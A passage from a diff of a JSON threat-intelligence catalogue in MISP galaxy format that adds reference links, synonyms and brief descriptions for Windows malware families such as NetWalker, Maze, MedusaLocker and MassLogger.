"https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://lopqto.me/posts/automated-dynamic-import-resolving", + "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware", + "https://www.cybereason.com/blog/cybereason-vs.-netwalker-ransomware", + "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/", + "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf", + "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/", + "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware", + "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million", + "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://tccontre.blogspot.com/2020/05/netwalker-ransomware-api-call.html", + "https://zero2auto.com/2020/05/19/netwalker-re/", + "https://www.incibe-cert.es/blog/ransomware-netwalker-analisis-y-medidas-preventivas", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/", + "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://zengo.com/bitcoin-ransomware-detective-ucsf/" + ], + "synonyms": [ + "Koko Ransomware", + "NetWalker" + ], + "type": [] + }, + "uuid": "722aab64-a02a-40fc-8c05-6b0344fad9b8", + "value": "Mailto" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", - "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/", + "https://www.cyber.nj.gov/threat-profiles/pos-malware-variants/majikpos" ], "synonyms": [], "type": [] @@ -11210,6 +20690,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" ], "synonyms": [], @@ -11231,6 +20712,20 @@ "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", "value": "MakLoader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://twitter.com/siri_urz/status/1221797493849018368" + ], + "synonyms": [], + "type": [] + }, + "uuid": "db4ca498-5481-4b68-8024-edd51d552c38", + "value": "Makop Ransomware" + }, { "description": "", "meta": { @@ -11265,7 +20760,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "https://securelist.com/the-return-of-mamba-ransomware/79403/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg" ], "synonyms": [ "DiskCryptor", @@ -11297,7 +20793,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", - "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf" ], "synonyms": [ "junidor", @@ -11335,6 +20832,19 @@ "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", "value": "ManItsMe" }, + { + "description": "Ransomware family closely related to GlobeImposter, notable for its use of SHACAL-2 encryption algorithm.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa", + "https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9fe92a48-6822-4ec0-b52b-d089f98590ec", + "value": "Maoloa" + }, { "description": "", "meta": { @@ -11353,6 +20863,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" ], "synonyms": [], @@ -11361,6 +20873,59 @@ "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", "value": "Marap" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa", + "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/", + "https://www.us-cert.gov/ics/advisories/ICSA-10-090-01", + "https://defintel.com/docs/Mariposa_Analysis.pdf" + ], + "synonyms": [ + "Autorun", + "Palevo", + "Rimecud" + ], + "type": [] + }, + "uuid": "6adb6fa0-1974-4d24-9c39-e76d5356cf6a", + "value": "Mariposa" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.masad_stealer", + "https://blogs.juniper.net/en-us/threat-research/masad-stealer-exfiltrating-using-telegram" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a85df9f-5295-4570-948a-67c2489bdd2d", + "value": "Masad Stealer" + }, + { + "description": "MassLogger is a .NET credential stealer. It starts with a launcher that uses simple anti-debugging techniques which can be easily bypassed when identified. This first stage loader eventually XOR-decrypts the second stage assembly which then decrypts, loads and executes the final MassLogger payload.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger", + "https://fr3d.hk/blog/masslogger-frankenstein-s-creation", + "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", + "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html", + "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/", + "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger", + "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/", + "https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html", + "https://twitter.com/pancak3lullz/status/1255893734241304576" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1a09bf8-974a-4cc4-9ffd-758bed7a785e", + "value": "MASS Logger" + }, { "description": "", "meta": { @@ -11379,7 +20944,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", - "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf" + "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware" ], "synonyms": [], "type": [] @@ -11414,6 +20981,105 @@ "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", "value": "Matsnu" }, + { + "description": "Specialized PoisonIvy Sideloader.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf", + "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "feb5ac55-7b28-47aa-9e9e-5007d838c0d5", + "value": "Maudi" + }, + { + "description": "Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.\r\n\r\nActors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout). \r\n\r\nThe code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.secureworks.com/research/threat-profiles/gold-village", + "https://www.docdroid.net/dUpPY5s/maze.pdf", + "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", + "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", + "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U", + "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", + "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat", + "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://securelist.com/maze-ransomware/99137/", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/", + "https://oag.ca.gov/system/files/Letter%204.pdf", + "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html", + "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf", + "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/", + "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://twitter.com/certbund/status/1192756294307995655", + "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", + "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + ], + "synonyms": [ + "ChaCha" + ], + "type": [] + }, + "uuid": "266c9377-34ef-4670-afa3-28bc0ba7f44e", + "value": "Maze" + }, { "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { @@ -11432,6 +21098,19 @@ "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", "value": "MBRlock" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker", + "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1f7fc94c-218a-4571-85b6-5667544bf230", + "value": "MBR Locker" + }, { "description": "", "meta": { @@ -11455,9 +21134,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" ], - "synonyms": [], + "synonyms": [ + "GoldStamp" + ], "type": [] }, "uuid": "cd055701-89ad-41be-b4d9-69460876fdee", @@ -11481,16 +21163,112 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", - "https://news.drweb.com/show/?i=10302&lng=en", - "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/" + "https://news.drweb.com/show/?i=10302&lng=en" ], "synonyms": [], "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", - "value": "Medusa" + "value": "Medusa (Windows)" + }, + { + "description": "A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", + "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", + "https://blog.talosintelligence.com/2020/04/medusalocker.html", + "https://www.cybereason.com/blog/medusalocker-ransomware", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", + "https://twitter.com/siri_urz/status/1215194488714346496?s=20", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" + ], + "synonyms": [ + "AKO Doxware", + "AKO Ransomware", + "MedusaReborn" + ], + "type": [] + }, + "uuid": "77e7221f-d3db-4d13-bcde-e6d7a494f424", + "value": "MedusaLocker" + }, + { + "description": "Megacortex is a ransomware used in targeted attacks against corporations.\r\nOnce the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", + "https://blog.malwarebytes.com/detections/ransom-megacortex/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/", + "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", + "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", + "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", + "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", + "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3f09884e-dddc-4513-8720-a28fe21ab9a8", + "value": "MegaCortex" + }, + { + "description": "Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin", + "https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "76cd241a-c265-4a33-8ce7-db2d3647b489", + "value": "MeguminTrojan" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", + "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bfebb298-66e3-4250-82e8-910b7dd8618c", + "value": "Mekotio" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.melcoz", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e3e289bb-3ac2-4f93-becd-540720501884", + "value": "Melcoz" }, { "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", @@ -11507,13 +21285,80 @@ "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e", "value": "Merlin" }, + { + "description": "Mespinosa is a ransomware which encrypts file using an asymmetric encryption and adds .pysa as file extension. According to dissectingmalware the extension \"pysa\" is probably derived from the Zanzibari Coin with the same name.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza", + "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/", + "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/", + "https://twitter.com/campuscodi/status/1347223969984897026" + ], + "synonyms": [ + "pysa" + ], + "type": [] + }, + "uuid": "68a7ca8e-2902-43f2-ad23-a77b4c48221d", + "value": "Mespinoza" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin", + "https://id-ransomware.blogspot.com/2020/10/metadata-bin-ransomware.html" + ], + "synonyms": [ + "Ransomware32" + ], + "type": [] + }, + "uuid": "750c5b2c-1489-4e11-b21d-c49b651d9227", + "value": "MetadataBin Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/", + "https://s.tencent.com/research/report/944.html", + "https://www.secrss.com/articles/17900", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html", + "https://m.threatbook.cn/detail/2527", + "https://www.youtube.com/watch?v=ftjDH65kw6E", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/" + ], + "synonyms": [ + "denesRAT" + ], + "type": [] + }, + "uuid": "64304fcc-5bc8-4000-9be2-4fc7a482897a", + "value": "METALJACK" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", + "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", + "https://blog.ensilo.com/metamorfo-avast-abuser", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", - "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" + "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767" ], "synonyms": [ "Casbaneiro" @@ -11523,6 +21368,29 @@ "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530", "value": "Metamorfo" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://blog.morphisec.com/fin7-attacks-restaurant-industry", + "http://schierlm.users.sourceforge.net/avevasion.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "13a5c0ae-8e2d-4a38-8b6c-7d746e159991", + "value": "Meterpreter (Windows)" + }, { "description": "", "meta": { @@ -11539,8 +21407,23 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", - "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/" + ], + "synonyms": [ + "BLame", + "MgmBot" + ], + "type": [] + }, + "uuid": "d97c2c0c-ef3a-4512-846a-f4cdeee7787a", + "value": "MgBot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha" ], "synonyms": [], "type": [] @@ -11566,8 +21449,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + 